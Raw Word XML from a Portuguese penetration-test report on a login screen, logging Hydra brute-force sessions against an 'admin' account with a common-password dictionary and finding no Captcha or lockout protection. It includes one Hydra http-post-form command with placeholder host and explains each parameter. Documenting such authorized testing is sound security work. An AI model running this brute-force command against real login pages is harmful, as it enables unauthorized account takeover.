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B60" w:rsidRDefault="00F15F82" w:rsidP="00AC10D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F15B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 RELATÓRIO DE EXECUÇÃO DOS TESTES </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00902307">
      <w:pPr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Nessa sessão, serão relatados, de forma detalhada, os resultados </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>obtidos na execução dos testes em cada iteração planejada. Serão apresentados os passos utilizados para detectar possíveis vulnerabilidades, as vulnerabilidades encontradas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e quais danos estas podem causar caso sejam exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15F82" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:line="0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Default="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00F3154F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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E52521" w:rsidP="00AC10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4.3.1.1 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Tela Login - Exploração via Força Bruta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Tarefa realizada dia 01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E52521" w:rsidP="00AC10DC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Duração</w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> total das sessões executadas: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1</w:t>
      </w:r>
      <w:r w:rsidR="00546F66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hora e 20 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1803" w:rsidRDefault="004E1803" w:rsidP="00AC10DC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52521" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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Default="00546F66" w:rsidP="00AC10DC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Utilizar a ferramenta Hydra, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">abordada no </w:t>
      </w:r>
      <w:r w:rsidR="00F15B60" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">capítulo </w:t>
      </w:r>
      <w:r w:rsidR="00F15B60" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00CC3790" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F15B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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para</w:t>
      </w:r>
      <w:r w:rsidR="003E1ACB" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontrar</w:t>
      </w:r>
      <w:r w:rsidR="00417333">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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por</w:t>
      </w:r>
      <w:r w:rsidR="00417333">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> meio de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="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tentativa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e erro, um login de um usuário e senha válido</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s para </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acessar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o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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4E1803" w:rsidRPr="00F15F82" w:rsidRDefault="004E1803" w:rsidP="00AC1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2A0DD8" w:rsidP="00AC10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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="00546F66" w:rsidP="00AC10DC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Configurar a Hydra, </w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com o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parâmetros</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D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="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha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,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para que ela realize os testes de acesso com força bruta na tela de Login.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2366" w:rsidRPr="00F15F8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A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="002A0DD8" w:rsidP="00AC1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A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00AC10DC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C97F3F" w:rsidRDefault="00EC2366" w:rsidP="00AC10DC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Espera-se que o sistema possua </w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteção</w:t>
      </w:r>
      <w:r w:rsidR="00FF6B3E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="00FF6B3E" w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Antis</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste</w:t>
      </w:r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4E1803" w:rsidRPr="004E1803" w:rsidRDefault="004E1803" w:rsidP="00AC10DC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E1803" w:rsidRPr="004E1803" w:rsidRDefault="005967D5" w:rsidP="00AC10DC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E1803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C12C3D" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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Indefinido.</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A ferramenta está esperando 3 parâmetros quando, a tela de Login só utiliza 2 na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00AC1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E1803" w:rsidRPr="00F15F82" w:rsidRDefault="004E1803" w:rsidP="00AC1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B3CB1" w:rsidRDefault="00FB3CB1" w:rsidP="00AC1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3CB1" w:rsidRDefault="00FB3CB1" w:rsidP="00AC1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F15F82" w:rsidRDefault="002A0DD8" w:rsidP="00AC1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Sessão de teste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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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Inserir um login de usuário válido e possíveis senhas mais comuns utilizadas para acesso de um sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F" w:rsidP="00AC1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7F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00AC10DC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C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F" w:rsidP="00AC10DC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Espera-se que o siste</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ma interrompa as sessões</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de testes</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>configuradas na ferramenta Hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>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D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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Comando utilizado: hydra -l admin -P forcaBruta IP_do_servidor http-post-form “</w:t>
      </w:r>
      <w:r w:rsidR="00AC10DC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/login.php:login=^USER^:senha=^PASS^:logado=false”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00F15F82" w:rsidRDefault="000A6729" w:rsidP="00AC1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No comando acima:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED180C" w:rsidRPr="00AC10DC" w:rsidRDefault="00ED180C" w:rsidP="0063043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highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“hydra” executa a ferramenta Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="0063043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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“-l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="0063043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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-P” aponta para o arquivo contendo as senhas que a H</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ydra tentará utilizar para acessar o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="00B7146E" w:rsidP="0063043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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP_do_servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="00DD5893" w:rsidP="0063043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http-post-form” informa</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o método utilizado</w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>para fazer a requisição ao servidor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8C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>protocolo</w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="0063043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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00AC10DC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r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é a URL utilizada para fazer a requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">USER é onde a Hydra deve inserir o </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="003745C8" w:rsidRPr="00AC10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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS é onde a Hydra deve inserir a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> válida usada na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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D60336" w:rsidRDefault="005967D5" w:rsidP="00AC10DC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F15F82" w:rsidRDefault="00F71E4B" w:rsidP="00AC10DC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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema não p</w:t>
      </w:r>
      <w:r w:rsidR="00517685" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Todas as sessões </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de teste</w:t>
      </w:r>
      <w:r w:rsidR="00564674" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s foram executadas </w:t>
      </w:r>
      <w:r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>pela Hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F8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64674" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sem nenhum tipo de interrupção por parte do sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="00564674" w:rsidRPr="00F15F8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2442F" w:rsidRDefault="0062442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C10DC" w:rsidRDefault="00AC10D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p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC1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56110" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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Configurar a ferramenta Hydra para executar </w:t>
      </w:r>
      <w:r w:rsidR="000A6729" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uma s</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de teste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s utilizando o </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login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“admin”, cadastrado na base de dados do sistema</w:t>
      </w:r>
      <w:r w:rsidR="000A6729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="00ED180C" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explorado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. Além disso, usar um dicionário de senhas retiradas da </w:t>
      </w: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Lista de Piores Senhas de 2015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da SplashData [1]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F" w:rsidP="00AC1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97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015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564674" w:rsidRPr="00F15F82" w:rsidRDefault="00564674" w:rsidP="00817857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Espera-se que o sistema possua </w:t>
